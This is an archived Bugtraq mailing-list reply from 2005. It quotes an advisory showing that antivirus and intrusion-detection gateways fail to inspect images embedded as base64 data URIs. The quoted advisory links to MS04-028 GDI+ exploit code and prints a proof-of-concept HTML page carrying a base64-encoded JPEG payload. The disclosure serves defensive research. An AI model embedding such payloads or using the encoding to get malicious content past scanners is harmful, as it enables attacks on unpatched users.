Movatterモバイル変換

[0]ホーム
URL:

Home page logo
bugtraq logo

Bugtraqmailing list archives

PreviousBy DateNext
PreviousBy ThreadNext

Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

From: Darren Bounds <lists () intrusense com>
Date: Tue, 11 Jan 2005 14:58:43 -0500
Hello Danny,
This vulnerability is only applicable to the HTTP data while intransit. Once received by the client the image will be rendered andsubsequently detected if local AV software.
At the present time, I'm not aware of any AV, IDS or IPS vendor thatwill detect malicious images imbedded in HTML in this manner.
Thank you,Darren BoundsIntrusense, LLC.--Intrusense - Securing Business As UsualOn Jan 11, 2005, at 2:14 PM, Danny wrote:
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds<dbounds () intrusense com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1Multi-vendor AV gateway image inspection bypass vulnerabilityJanuary 10, 2005A vulnerability has been discovered which allows a remote attacker tobypass anti-virus
(as well other security technologies such as IDS and IPS) inspectionof
HTTP image content.By leveraging techniques described in RFC 2397 for base64 encodingimage content within
the URL scheme. A remote attack may encode a malicious image withinthe
body of an HTMLformatted document to circumvent content inspection.For example:http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.phpThe source code at the URL above will by default create a JPEG imagethat will attempt (and fail
without tweaking) to exploit the Microsoft MS04-028 GDI+vulnerability.
The image itself is detectedby all AV gateway engines tested (Trend, Sophos and McAfee), however,when the same image
is base64 encoded using the technique described in RFC 2397(documented
below), inspectionis not performed and is delivered rendered by the client.While Microsoft Internet Explorer does not support the RFC 2397 URLscheme; Firefox, Safari,Mozilla and Opera do and will render the data and thus successfullyexecute the payload if the necessaryOS and/or application patches have not been applied.## BEGIN HTML ##<html><body><imgsrc="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
/X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJCAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/bAEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
Z"></body></html>## END HTML ##Solution:While AV vendor patches are not yet available, fixes for all currentlyknown image vulnerabilities areand have been for several months.  If you have not yet applied them,you have your ownnegligence to blame.Contributions:Thanks to Scott Roeder and Jacinto Rodriquez their assistance inplatform testing.
I believe TrendMicro's OfficeScan (client-server scanner) will catchit, but I am not sure about their gateway device. What was theirresponse?...D
PreviousBy DateNext
PreviousBy ThreadNext
Current thread:




[8]ページ先頭


©2009-2026 Movatter.jp